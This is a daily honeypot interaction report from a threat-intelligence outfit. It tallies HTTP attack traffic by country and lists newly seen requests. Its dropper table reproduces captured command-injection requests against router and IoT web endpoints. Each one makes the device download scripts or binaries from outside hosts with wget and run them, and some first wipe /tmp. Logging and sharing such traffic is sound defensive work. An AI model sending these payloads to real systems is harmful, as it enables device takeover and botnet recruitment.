
Report: 2025-08-11

Author
Shoggoth Industries

Daily Report: 2025-08-11

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 10 stage 1 IP address(es), linked to 8 dropper URL(s).

There are 4 new requests that have never been observed before (these were added to the monitored request database).

A total of 476 requests were recorded during the day, originating from 10 different countries, with a peak of 153 requests coming from the US.

ot_simplified_report

Simplified report of medium-level interactions with honeypots that mimic industrial systems (website loading or interactions with the website). For more information, contact us at social@shoggoth.industries.

| source_country | targeted_country |
| --- | --- |
| SG | Germany |
| US | Germany |
| US | Dubai |

botnet_dropper_behaviour

| remote_addr | request |
| --- | --- |
| 45.156.87.165 | GET /board.cgi?cmd=wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.dcn.sh%7Csh%3B HTTP/1.0 |
| 47.102.185.146 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 45.156.87.165 | GET /shell?busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.vcp.sh%7Csh%26 HTTP/1.1 |
| 45.156.87.165 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1 HTTP/1.1 |
| 8.219.238.211 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 156.196.120.75 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1 |
| 45.156.87.165 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%3B%60 HTTP/1.1 |
| 45.153.34.251 | GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C/45.9.2.5/arm7;chmod+777+arm7;./arm7+arm7;wget+http:/\x5C/45.9.2.5/arm;chmod+777+arm;./arm+arm;wget+http:/\x5C/45.9.2.5/arm4;chmod+777+arm4;./arm4+arm7;wget+http:/\x5C/45.9.2.5/arm5;chmod+777+arm5;./arm5+arm5;wget+http:/\x5C/45.9.2.5/arm6;chmod+777+arm6;./arm6+arm6 HTTP/1.1 |
| 117.209.24.191 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.209.24.191:45070/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |
| 197.36.47.59 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1 |

request

The requests listed here are those that have not yet been integrated into the request database.

|  | number_of_occurence | request |
| --- | --- | --- |
| 210 | 1 | \x00\x0E\x08.\xDEsQ}n\xA8a\x00\x00\x00\x00\x00 |
| 211 | 1 | \x00\x0E8.\xDEsQ}n\xA8a\x00\x00\x00\x00\x00 |
| 212 | 1 | \x00\x0E\x08\x12\xF7<c\xA5\x82\x22\xAC\x00\x00\x00\x00\x00 |
| 213 | 1 | \x00\x0E8\x12\xF7<c\xA5\x82\x22\xAC\x00\x00\x00\x00\x00 |

country_iso_code

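|  | number_of_occurence | country_iso_code |
| --- | --- | --- |
| 0 | 153 | US |
| 1 | 82 | BG |
| 2 | 49 | GB |
| 3 | 48 | HK |
| 4 | 22 | DE |
| 5 | 20 | RO |
| 6 | 14 | NL |
| 7 | 14 | IN |
| 8 | 11 | PL |
| 9 | 10 | FR |
| 10 | 10 | SC |
| 11 | 6 | SG |
| 12 | 5 | CA |
| 13 | 4 | ZA |
| 14 | 3 | LT |
| 15 | 3 | BR |
| 16 | 3 | CN |
| 17 | 2 | RU |
| 18 | 2 | IT |
| 19 | 2 | VN |
| 20 | 2 | IR |
| 21 | 2 | CH |
| 22 | 2 | EG |
| 23 | 1 | ES |
| 24 | 1 | PA |
| 25 | 1 | AZ |
| 26 | 1 | KR |
| 27 | 1 | SE |
| 28 | 1 | KE |
| 29 | 1 | BE |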
